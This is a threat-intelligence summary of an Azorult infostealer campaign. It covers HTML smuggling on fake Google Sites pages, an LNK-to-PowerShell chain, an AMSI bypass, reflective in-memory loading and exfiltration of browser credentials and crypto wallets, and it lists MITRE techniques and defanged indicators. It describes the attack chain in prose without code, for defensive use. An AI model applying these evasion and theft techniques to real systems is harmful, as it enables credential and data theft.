From Delivery To Execution: An Evasive Azorult Campaign Smuggled Through Google Sites

Netskope Threat Labs dissected an evasive Azorult campaign that uses Google Sites as a decoy and employs HTML smuggling, CAPTCHA gating, AMSI bypass, and reflective code loading to deliver and execute a fileless infostealer. The attack chain includes an LNK-triggered PowerShell workflow that downloads a loader and scripts which load Azorult into memory and exfiltrate browser credentials, crypto wallet data, screenshots, and documents to a C2. #Azorult #GoogleSites

Keypoints

Initial delivery used HTML smuggling hosted on fake Google Sites pages; the malicious payload was stored as a BASE64 string inside a separate JSON on a compromised domain.
The attacker gated the smuggled HTML with a CAPTCHA to prevent automated scanners from retrieving the payload.
The delivered payload is an LNK file that spawns a CMD batch file and a scheduled task to run a PowerShell chain; certutil.exe is used to decode an embedded PowerShell command.
JavaScript and PowerShell stages (qtoW0vI2.js → agent1.ps1 / agent3.ps1) persist to %ProgramData%, download additional scripts and binaries, and execute code via wscript.exe and Invoke-Expression/Invoke-WebRequest.
agent1.ps1 implements an AMSI bypass; agent3.ps1 downloads an Azorult loader (service.exe) and executes it in memory using reflective code loading (Marshal.Copy, VirtualAlloc, CreateThread).
A later stage (sd2.ps1) retrieves an XOR key from a C2, decodes the Azorult payload, and the .NET Azorult binary (pg20.exe) is loaded via Assembly.Load to harvest screenshots, browser logins, cookies, and crypto wallet extensions.
Collected data are compressed and encrypted (using a Curve25519-derived shared secret) and exfiltrated to the C2 over HTTP/HTTPS.

MITRE Techniques

[T1204] User Execution – The campaign relies on a malicious shortcut to trick users to run the payload (‘The payload is an LNK shortcut file that uses a PDF icon to trick users into clicking it.’)
[T1218.010] Signed Binary Proxy Execution (certutil) – certutil.exe is used to decode the base64 PowerShell payload (‘The Powershell command is then decoded using a Windows native application named certutil.exe’)
[T1053] Scheduled Task/Job – The attack creates a scheduled task to run the decoded batch file (‘It then creates a scheduled task named t09pxsrXKG that executes the batch file Fyap4cKJ.bat.’)
[T1105] Ingress Tool Transfer – Multiple stages download components via web requests (Invoke-WebRequest) from compromised domains (‘…starts by downloading the Azorult loader (service.exe) from the earlier compromised domain using Invoke-WebRequest.’)
[T1055] Process Injection – Reflective code loading is used to execute the loader and shellcode in memory without writing the PE to disk (‘execute the Azorult infostealer in memory using reflective code loading.’)
[T1562.001] Impair Defenses: Disable or Modify Security Tools – The agent1.ps1 script forces AMSI initialization to fail to evade host-based scanning (‘The first powershell script (agent1.ps1) executed is used to bypass the Antimalware Scan Interface (AMSI).’)
[T1113] Screen Capture – Azorult takes screenshots of the primary display to collect visual data (‘Azorult initially collects a screenshot of the device’s screen.’)
[T1539] Credentials from Web Browsers – The malware copies browser artifacts (Login Data, Cookies, Web data) to exfiltrate credentials and session data (‘It copies the content of Chrome’s Login Data, Local State, Cookies, and Web data into the roaming folder path to be exfiltrated later.’)
[T1041] Exfiltration Over C2 Channel – Stolen files are encrypted then sent to a C2 server over HTTP/HTTPS (‘All stolen files and data are then transmitted to the C2 server over HTTP.’)

Indicators of Compromise

[Domain] delivery and payload hosting – mahmudiyeresort[.]com[.]tr (JSON payload host), sqjeans[.]com (JS/PHP payload host)
[File names] downloader and stage files – Fyap4cKJ.bat, qtoW0vI2.js, and 6 more filenames (agent.js, agent1.ps1, agent3.ps1, service.exe, sd2.ps1, pg20.exe)
[Scheduled Task] persistence/activation – t09pxsrXKG (task name used to execute the batch file)

<li/[Executable] loader name – service.exe (Azorult loader fetched and executed in memory)

HTML smuggling hosted on Google Sites served as the initial vector: a fake Google Docs page references a separate compromised domain to fetch a JSON file containing a BASE64-encoded payload. The page presents a CAPTCHA to block automated scanners; once a user passes the CAPTCHA the embedded JavaScript reconstructs and downloads an LNK shortcut. When the LNK is opened it writes and runs a batch file (Fyap4cKJ.bat), uses certutil.exe to decode a Base64 PowerShell command, and creates a scheduled task (t09pxsrXKG) to execute further PowerShell stages.

The JavaScript stage (qtoW0vI2.js) copies itself to %ProgramData% as agent.js, checks for indicators to self-delete, and downloads two PowerShell scripts (agent1.ps1 and agent3.ps1). agent1.ps1 toggles AMSI initialization to bypass host scanning; agent3.ps1 downloads a binary loader (service.exe) and places its bytes into memory buffers. The script defines and copies shellcode ($sc) and the executable byte array ($image) into allocated memory via Marshal.Copy/VirtualAlloc, obtains API addresses (VirtualAlloc/CreateThread/WaitForSingleObject), then creates a thread to execute the in-memory payload—achieving reflective loading and avoiding disk artifacts.

After initial in-memory execution, the loader fetches sd2.ps1, retrieves an XOR key from the C2, decodes the embedded Azorult binary, and loads the .NET payload (pg20.exe) via Assembly.Load. Azorult collects screenshots, browser databases (Chrome/Firefox login and cookie files), and crypto-wallet extension data and documents (by targeted extensions, filenames, and extensions), compresses and encrypts stolen data using a Curve25519-derived shared secret, and exfiltrates the results to the C2 over HTTP/HTTPS.